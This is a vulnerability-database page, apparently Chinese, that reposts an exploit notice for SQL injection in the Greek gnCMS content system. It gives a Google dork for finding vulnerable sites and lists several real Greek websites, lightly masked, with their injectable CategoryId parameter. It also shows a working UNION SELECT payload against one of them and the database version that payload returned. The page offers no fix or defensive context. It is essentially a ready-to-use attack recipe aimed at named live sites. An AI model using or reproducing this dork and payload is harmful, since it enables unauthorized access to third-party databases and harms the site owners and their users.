gnCMS SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040667 漏洞类型
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120219
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] Exploit Title : gnCMS SQL Injection
[*]
[*] Exploit Author : Ashiyane Digital Security Team
[*]
[*] Dork : intext:Created & Hosted by GroupNet powered by gnCMS inurl:CategoryId=
[*]
[*] Vendor Homepage : www.groupnet.gr
[*]
[*] Data : 2015.12.17
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] Admin Page ==> site.com/admin/
[*]
[*] Demo :
[*]
[*] www.healthfilmfXestival.gr/index.php?module=news&position=center&ArticleId=129&CategoryId=[sql]
[*]
[*] www.myhba.grX/index.php?module=news&position=center&&CategoryId=[sql]
[*]
[*] www.epigramXma.gr/index.php?position=center&module=articles&CategoryId=[sql]
[*]
[*] www.aptcc.Xgr/index.php?module=news&position=center&ArticleId=236&CategoryId=[sql]
[*]
[*] www.myaXsfaleia.gr/index.php?module=news&position=center&&CategoryId=[sql]
[*]
[*] ,....
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] Exploit Examples :
[*]
[*] www.myXhba.gr/index.php?module=news&position=center&&CategoryId=-1 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -
[*]
[*] THE VERSION IS  5.5.46-cll
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]
[*]
[*] SPT To :  Mahdi.Hidden
[*] Discovered by : kcaher
[*]
[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]